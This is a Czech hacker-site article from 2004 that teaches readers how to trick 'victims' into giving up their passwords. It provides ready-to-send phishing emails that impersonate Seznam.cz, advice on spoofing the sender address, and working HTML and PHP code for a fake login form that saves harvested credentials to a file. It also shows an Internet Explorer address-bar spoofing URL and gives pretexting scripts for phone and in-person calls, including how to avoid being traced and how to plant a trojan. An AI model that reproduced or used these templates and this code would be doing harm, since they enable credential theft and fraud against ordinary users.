Psychologie - nejúčinnější způsob získávání hesel
Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: Kub@z
Datum: 13.6.2004
Hodnocení/Hlasovalo: 1.77/264
Donucení oběťi, aby vám dala svoje heslo dobrovolně a aniž by o tom věděla, je asi nejrychleší a nejsnažší způsob získání hesla. Tento článek vám poradí, jak na to
V tomto článku se pokusím popsat základní formy "psychologického
útoku".
1) Falešný email
Obtížnost: Velmi snadné
Proveditelnost: 95%
Účinnost: 40%
Riziko odhalení: Velmi velké
Tuto základní a nejjednodušší formu útoku už jsem popsal v článku
o hackování emailu. Spočívá ve vytvoření emailové schránky s
věrohodným jménem na stejném serveru, na kterém má email oběť (např.
passwords@seznam.cz :)). Pak na email oběti pošlete zo této emailové
schránky email ve znění např.:
Vážený uživateli,
z důvodu chystaného zrušení neaktivních emailových schránek, by
se mohlo stát, že by byl zrušen i Váš účet. Pokud tuto emailovou
schránku používáte, zašlete prosím na email passwords@seznam.cz
zprávu ve tvaru:
login: Váš login
pass: Vaše heslo
Tedy pokud máte emailovou schránku např. petr@seznam.cz a heslo
"ahoj" bude zaslaný email vypadat takto:
login: petr
pass: ahoj
Děkujeme za pochopení,
Team Seznam.cz
Zde vidíme jednu z forem psychologického nátlaku. Oběti zde hrozí,
že pokud svoje jméno a heslo nepošle, bude její chránka zrušena.
Tento nátlak můžete ještě zvýšit přidáním textu např.:
Vzhledem k tomu, že rušení emailů proběhne za 3 dny, doporučujeme
Vám, abyste potvrzovací email odeslal(a) co nejdříve.
Tento email si oběť přečte třeba až dva dny po datu doručení,
zazmatkuje a heslo vám pošle. Ale přeci jen, pokud je oběť alespoň
trochu inteligentní, dojde jí, že to, že se nás server ptá na naše
heslo, nemá logiku. Proto je tento způsob vhodný hlavně na oběti,
které toho moc o internetu a počítačích neví.
2) Rozšíření falešného emailu o falešnou adresu odesílatele
Obtížnost: Musíte umět spustit program :)
Proveditelnost: 95%
Účinnost: 50%
Riziko odhalení: Velké
Tento útok je vlastně jenom rozšíření přechozího typu. Spočívá v tom,
že podvodnou emailovou zprávu pošlete jakoby z adresy, která je o trochu
věrohodnější, než ta, kterou jste si vytvořili. Toho docílíte pomocí
programů na odesílání fake mailů. "Fake mail" je email se sfalšouvanou
hlavičkou. Můžete si tak nastavit i adresu odesílatele, a přeci jenom
"admin@seznam.cz" vypadá o trochu líp, než třeba "pass_adm@seznam.cz".
Programů tohoto typu naleznete na internetu spoustu. A pokud jste trochu
chytřejší, příjdete na to, že k tomu můžete použít třeba i obyčejný
Outlook Express. Stačí si najít nějaký free smtp server, nebo zprovoznit
smtp server přímo na vašem počítači.
3) Vytvoření falešného formuláře
Obtížnost: Větší (znalost HTML a PHP)
Proveditelnost: 50%
Účinnost: 90%
Riziko odhalení: Velmi malé
Tato metoda spočívá ve vytvoření falešného formuláře, do kterého
přinutíte oběť zadat její přihlašovací údaje. Toho docílíte tak, že si
zaregistrujete na serveru, na kterém má oběť email nebo web, freehosting
s věrohodnou adresou (např. servis.webzdarma.cz - mimochodem, v době psaní
článku ještě existuje - moje stránka :)) a okopírujete standartní
přihlašovací formulář na serveru (aby vypadal věrohodně, co se týče vzhledu).
V této HTML stránce pak upravíte text nad přihlašovacími údaji např. na
(originální :)):
Vážený uživateli webhostinových služeb serveru webzdarma.cz,
dovolujeme si Vás upozornit, že se chystáme přejít na nový
výkonnější systém a při této příležitosti také smažeme nepoužívané
účty. Pokud si tedy chcete prodloužit platnost svého účtu, zadejte
prosím své přihlašovací údaje do formuláře níže
Formulář pak musíte upravit tak, aby ho zpracovával váš PHP (samozřejmě
můžete použít i jiný serverový scriptovací jazyk) script. Ten uloží
zadané informace do souboru, nebo vám je pošle na mail (nebo je uloží do
databáze apod.). Zde je příklad:
--- index.html ---
<html>
<body>
Vážený uživateli....
<form action="post.php" method="post">
Login: <input type="text" name="login"><br>
Heslo: <input type="password" name="heslo"><br>
<input type="submit" value="Odeslat">
</form>
</body>
</html>
--- post.php ---
<?
$file = @FOpen("hesla.txt", "r");
$data = @FRead($file,FileSize("hesla.txt"));
@FClose($file);
$file = FOpen("hesla.txt", "w");
FWrite($file,$data.$login." : ".$heslo."\n");
FClose($file);
?>
<html>
<body>
Vaše žádost byla vyřízena, děkujeme za spolupráci
</body>
</html>
Toto je jednoduchá ukázka toho, na jakém principu ten formulář vlastně
funguje. Tato metoda je opravdu velmi účinná. Stačí potom jenom
kamarádovi říct, aby se na danou stránku podíval, nebo cizí osobě
můžete poslat fake mail.
4) Falešný formulář + fake mail + IE bar spoofing
Obtížnost: Velká
Proveditelnost: 80%
Účinnost: 80%
Riziko odhalení: Střední
pozn.:
Tato metoda počítá s tím, že oběť používá nezapatchovaný Internet Explorer.
Pokud tedy oběť používá jiný prohlížeč, rozhodně tuto metodu nezkoušejte!!!
Co dělat, když oběť email nebo www stránku na serveru, kde si nemůžete
registrovat vlastní freehosting? Nyní řekněme, že oběť má emailovou
schránku petr@seznam.cz. Vytvořte si formulář ve vzhledu Seznamu a nahrajte
ho na libovlný účet třeba na webzdarma.cz. Pak pošlete oběti email, kterým oběť
donutíte kliknout na odkaz, který do emailu přidáte. Možná si teď říkáte:
"No jo, ale nebude trochu podezřelý, když ten formulář bude na wz?". Odpověď
zní: Nebude. Sačí, aby si oběť myslela, že zobrazovaná stránka je na seznamu.
Jak toho docílíme? Pomocí chyby v IE nazývané "Bar Spoofing". Spočívá v tom,
že text zobrazený v panelu adresa neodpovídá adrese zobrazené stránky. Toho
docílíme pomocí speciální série znaků v odkazu:
http://zobrazená_adresa%00@skutečná_adresa
Tedy v našem případě např.:
http://servis.seznam.cz%00@hackmail.webzdarma.cz
O tom, jestli to funguje i na vašem počítači se můžete přesvědčit
ZDE.
Tato metoda je opravdu velice účinná, akorát oběť musí klinkout na odkaz, který jste jí
poslali, protože kdyby napsala oadresu přímo do prohlížeče, tak máte smůlu.
5) Získání hesla přes telefon
Obtížnost: Velmi velká
Proveditelnost: Závisí na vašich hereckých dovednostech
Účinnost: Závisí na vašich hereckých dovednostech
Riziko odhalení: Velké
Tato metoda spočívá v tom, že oběti zavoláte a pokusíte se ji přesvědčit, že
jste zaměstnanec firmy, u které má oběť email, www stránku apod. Tato metoda
je velmi obtížná a chce to hlavě se velmi dobře informovat o firmě, "pro kterou
pracujete", protože kdyby se vás oběť najednou zeptala třeba: "Kolik stojí ta
nová služba '2 emaily za cenu jednoho'" a vy byste nevěděli, o čem mluví, tak
by to byl docela problém. Druhá důležitá věc je mít hovor připravený předem.
Rozhodně nedoporučuji nějak výrazně improvizovat, protože pak se může stát,
že se zamotáte do toho, co jste říkali a porzradíte se. A ta nejdůležitější
věc je, perfektně to zahrát. Pokud se po dvaceti sekundách začnete histericky
smát, nebo se vám roztřese hlas tak, že nebudete moct mluvit, tak vám to asi
nevyjde. Poslední důležitá věc je, správně hovor zakončit, protože je žádoucí,
aby oběť nezjistila, že je obětí :). Zkuste se třeba objeti zeptat, jak je
spokojena se službami vašeho serveru a třeba jí nějaké další nabídnout, protože
to dokáže vyvrátit pochybnosti.
A ještě jdna poznámka - volejte vždy z budky, protože vždy se může stát, že
se prozradíte, a rozhodně by nebylo příjemé, kdyby si "oběť" zjistila vaše
telefonní číslo a adresu a přišla si to s vámi vyříkat osobně
6) Získání hesla osobně od oběti
Obtížnost: Obrovská
Proveditelnost: Závisí na vašich hereckých dovednostech
Účinnost: Závisí na vašich hereckých dovednostech
Riziko odhalení: Obrovské
Tato metoda je prakticky stejná jako předchozí, až na to, že oběť navštívíte
osobně a mluvíte s ní očí do očí, což už chce hodně pevné nervy. No a samozřejmě
se můžete pokusit získat heslo, jako při telefonickém rozhovoru, nebo můžete oběť
třeba přesvědčit, že jste technik (třeba Telecomu), který má vyřešit nějakou poruchu
a oběti třeba nainstalovat do počítače trojana. Fantazii se meze nekladou... Ale toto
je typ útoku, na který si rozhodně netroufám ani já, takže pokud se vám ho povede
úspěšně realizovat, tak jste opravdu borci...
A to je pro tento článek vše :)